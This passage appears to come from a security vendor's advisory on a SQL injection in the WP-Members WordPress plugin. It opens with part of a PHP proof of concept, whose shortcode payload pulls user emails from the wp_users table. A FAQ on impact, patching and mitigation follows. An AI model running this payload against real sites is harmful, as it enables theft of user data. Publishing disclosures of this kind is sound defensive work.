$create_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from post creation page
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';

// Step 3: Submit post with SQL injection payload
// The payload extracts user emails from wp_users table
$submit_post_url = $target_url . '/wp-admin/post.php';
$post_content = '[wpmem_user_membership_posts order_by="id,(SELECT GROUP_CONCAT(user_email) FROM wp_users WHERE 1=1)--"]';

$post_fields = array(
    'post_title' => 'Test Exploit Post',
    'content' => $post_content,
    'action' => 'editpost',
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $create_post_url,
    'post_type' => 'post',
    'post_status' => 'draft',
    'publish' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $submit_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
$response = curl_exec($ch);

// Step 4: View the post to trigger SQL execution
// The shortcode renders and executes the injected SQL
$post_id = '';
if (preg_match('/post=([0-9]+)/', $response, $matches)) {
    $post_id = $matches[1];
    $view_post_url = $target_url . '/?p=' . $post_id . '&preview=true';
    curl_setopt($ch, CURLOPT_URL, $view_post_url);
    curl_setopt($ch, CURLOPT_POST, false);
    $response = curl_exec($ch);
    
    // Check for SQL error messages or extracted data in response
    if (strpos($response, 'user@example.com') !== false) {
        echo "SQL Injection successful - data extractedn";
    } else if (strpos($response, 'SQL syntax') !== false) {
        echo "SQL Injection attempted - error visiblen";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-2363?
Overview of the vulnerability
CVE-2026-2363 is a SQL Injection vulnerability found in the WP-Members Membership Plugin for WordPress. It affects versions up to and including 3.5.5.1, allowing authenticated users with Contributor-level access or higher to manipulate SQL queries through the ‘order_by’ shortcode attribute.
How does the SQL Injection vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and lack of prepared statements in the handling of the ‘order_by’ parameter. Attackers can inject malicious SQL code, potentially allowing them to extract sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WP-Members Membership Plugin version 3.5.5.1 or earlier is vulnerable. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin dashboard and look for the WP-Members Membership Plugin. Verify that the version is 3.5.5.1 or earlier.
How can I fix or mitigate this vulnerability?
Recommended actions
The vulnerability can be fixed by updating the WP-Members Membership Plugin to version 3.5.6 or later, where the issue has been patched. It is also advisable to regularly update all plugins to their latest versions.
What does the CVSS score of 6.5 indicate?
Understanding risk levels
The CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk that could lead to data exposure if exploited.
What is the significance of the CWE-89 classification?
Categorizing the vulnerability
CWE-89 refers to SQL Injection vulnerabilities, which occur when an application allows untrusted data to be included in SQL queries without proper validation. This classification highlights the nature of the security issue.
What does the proof of concept demonstrate?
Explaining the example code
The proof of concept provided illustrates how an authenticated attacker can exploit the vulnerability by injecting SQL commands through the ‘order_by’ parameter. It shows the steps to authenticate and execute a malicious payload.
What are the potential consequences of exploitation?
Risks associated with the vulnerability
If exploited, this vulnerability could allow attackers to access sensitive data stored in the WordPress database, including user credentials and plugin configurations, potentially compromising the entire site.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing web application firewalls, regular security audits, and user access controls to minimize the risk of exploitation.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed about future vulnerabilities, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the National Vulnerability Database (NVD) for updates.
What should I do if I cannot update the plugin immediately?
Interim measures
If immediate updates are not possible, consider disabling the WP-Members Membership Plugin until a secure version can be installed. Additionally, review user permissions to limit access to only necessary users.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations